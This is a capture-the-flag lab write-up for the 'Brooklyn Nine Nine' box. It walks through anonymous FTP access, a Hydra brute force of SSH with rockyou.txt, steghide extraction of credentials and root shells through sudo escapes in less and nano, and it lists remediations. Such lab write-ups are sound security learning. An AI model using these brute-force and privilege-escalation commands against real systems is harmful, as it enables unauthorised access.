Overview

Brooklyn Nine Nine is a beginner-friendly CTF with two complete attack chains leading to root. Both paths start from the same open ports but diverge based on which service you enumerate first. I completed both.

Target: 10.64.148.145 OS: Ubuntu Tools: Nmap, FTP, Hydra, Steghide, SSH, Netcat

Reconnaissance

nmap -sV -p- 10.64.148.145

Three ports open:

  • Port 21: FTP (vsftpd 3.0.3)
  • Port 22: SSH (OpenSSH 7.6p1)
  • Port 80: HTTP (Apache 2.4.29)

Path 1: FTP Anonymous Login to Jake

FTP was the first thing to check. vsftpd sometimes allows anonymous login with no password.

ftp 10.64.148.145

Username: anonymous, password: blank. It worked. A note from Amy to Jake was sitting in the FTP directory warning him that his password was too weak.

That gave a confirmed username and a hint that the password would fall to a wordlist. Hydra brute-forced SSH:

hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.64.148.145 ssh

Jake's password was in the rockyou.txt file, and the SSH login worked.

Checking sudo permissions:

sudo -l

Jake could run /usr/bin/less as root with no password. Less is a file pager, but it supports shell escapes. Opening any file with sudo less and then typing !sh inside it spawns a root shell, because less is already running as root.

sudo less /etc/passwd
!sh

Root shell obtained.

Path 2: Steganography to Holt

The HTTP port had a Brooklyn Nine Nine themed page with a single image: brooklyn99.jpg. Downloading it and running steghide revealed hidden data inside.

wget http://10.64.148.145/brooklyn99.jpg
steghide extract -sf brooklyn99.jpg

The passphrase was admin. The extracted file contained Holt's SSH password.

ssh holt@10.64.148.145

Checking sudo permissions for holt:

sudo -l

Holt could run /bin/nano as root with no password. Nano also supports shell escapes. Opening nano with sudo, then pressing Ctrl+R and Ctrl+X opens an execute command prompt.

sudo nano

Then: reset; sh 1>&0 2>&0

Root shell obtained through a different program, same concept.

What Steganography Is

Steganography is hiding data inside another file. In this case, credentials were hidden inside a JPEG image. The image looks completely normal to anyone viewing it. Only someone who knows how to run Steghide against it and has the right passphrase can extract the hidden content.

It is used in CTFs to simulate real-world scenarios where attackers hide data inside innocent-looking files to avoid detection. In a real investigation, finding hidden data inside images on a web server would be a significant finding.

Vulnerability Summary

FTP Anonymous Login

vsftpd was configured to allow anonymous access, which exposed a note containing a valid username and confirmation of a weak password.

Remediation: Disable anonymous FTP access unless explicitly required. Never store sensitive information in FTP directories.

Weak SSH Password

Jake's password was in rockyou.txt and fell to Hydra in a short time.

Remediation: Enforce strong password policies. Implement SSH key-based authentication and disable password login entirely.

Sudo Shell Escape via Less

Jake had unrestricted sudo access to /usr/bin/less. Less supports the ! command to execute shell commands, which produces a root shell when the binary is running with elevated privileges.

Remediation: Audit sudo permissions carefully. GTFOBins documents shell escapes for common binaries. Never grant sudo access to interactive programs like less, nano, vim, or more unless it is absolutely necessary.

Sudo Shell Escape via Nano

Holt had unrestricted sudo access to /bin/nano. Nano's Ctrl+R > Ctrl+X execute command feature produces the same result.

Remediation: Same as above. Any text editor or pager with sudo access is a privilege escalation primitive.

Sensitive Credentials Hidden in Web-Accessible Image

Holt's credentials were embedded in an image served publicly on the web server. Anyone who downloaded the image and ran steghide against it with a common passphrase could extract them.

Remediation: Never store credentials in files served from a web server, hidden or otherwise.

Key Takeaways

Always try anonymous FTP login. vsftpd with anonymous access enabled is common and often contains useful files.

GTFOBins is the reference for sudo shell escapes. If a binary appears in sudo -l, check GTFOBins immediately for known escape techniques. Less, nano, vim, more, and many others are on the list.

Both less and nano shell escapes work the same way. The programs have built-in features to execute shell commands. When running as root via sudo, those commands run as root.

Steganography requires knowing to look for it. The HTTP port looked like a dead end, just a themed page with an image. Downloading the image and running steghide is not an obvious step, but checking all three open ports completely is standard recon practice.

This lab is part of my ongoing security portfolio. You can find all my write-ups at github.com/barrytd/security-lab-portfolio.